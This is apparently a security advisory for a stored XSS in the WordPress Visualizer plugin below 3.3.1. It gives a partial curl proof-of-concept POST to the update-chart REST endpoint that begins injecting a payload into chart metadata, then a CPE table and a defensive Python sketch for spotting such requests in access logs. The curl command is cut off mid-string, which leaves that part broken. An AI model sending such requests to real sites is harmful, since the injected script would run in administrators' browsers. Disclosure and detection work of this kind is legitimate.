By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify the metadata of an existing chart and inject an XSS payload that is stored and later executed when an admin goes to edit the chart.
curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.158.128:8000' -H $'Content-Type: application/json' \
    --data-binary $'{"id": 7, "visualizer-chart-type": "\\">
CPE

Name | Operator | Version |
---|---|---|
visualizer | lt | 3.3.1 |
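
A log-triage sketch for the endpoint and version range given above, added here as an example (it is not code from the advisory or the plugin): it lists POST requests to the update-chart route in web-server access logs and checks an installed plugin version against "lt 3.3.1". The Combined Log Format, the helper names and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ROUTE = "/visualizer/v1/update-chart"  # REST route named in the advisory
FIXED = (3, 3, 1)                      # advisory CPE: visualizer lt 3.3.1
# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def is_affected(version):
    """True when a dotted plugin version is lower than 3.3.1."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    parts += (0,) * (3 - len(parts))  # pad "3.3" to (3, 3, 0)
    return parts < FIXED

def rest_route(target):
    """Return the REST route a request target addresses, or None.
    WordPress serves routes as /wp-json/<route> and as ?rest_route=/<route>."""
    url = urlsplit(target)
    path = unquote(url.path)
    if "/wp-json/" in path:
        return "/" + path.split("/wp-json/", 1)[1].strip("/")
    qs = parse_qs(url.query).get("rest_route")  # parse_qs percent-decodes
    return "/" + qs[0].strip("/") if qs else None

def update_chart_hits(lines):
    """Return (client ip, timestamp, status) for each POST to update-chart."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, when, method, target, status = m.groups()
        if method == "POST" and rest_route(target) == ROUTE:
            hits.append((ip, when, int(status)))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.5 - - [10/Oct/2019:13:55:36 +0000] "POST /wp-json/visualizer/v1/update-chart HTTP/1.1" 200 17 "-" "curl/7.64.0"',
    '198.51.100.7 - - [10/Oct/2019:13:56:01 +0000] "GET /wp-json/visualizer/v1/update-chart HTTP/1.1" 404 52 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2019:13:57:12 +0000] "POST /index.php?rest_route=%2Fvisualizer%2Fv1%2Fupdate-chart HTTP/1.1" 200 17 "-" "curl/7.64.0"',
    '198.51.100.7 - - [10/Oct/2019:13:58:40 +0000] "POST /wp-json/wp/v2/comments HTTP/1.1" 201 310 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("3.3.0 affected:", is_affected("3.3.0"))
    for hit in update_chart_hits(SAMPLE):
        print(hit)
```

Access logs do not record request bodies, so each hit is a lead to compare against the stored chart metadata rather than proof of injection.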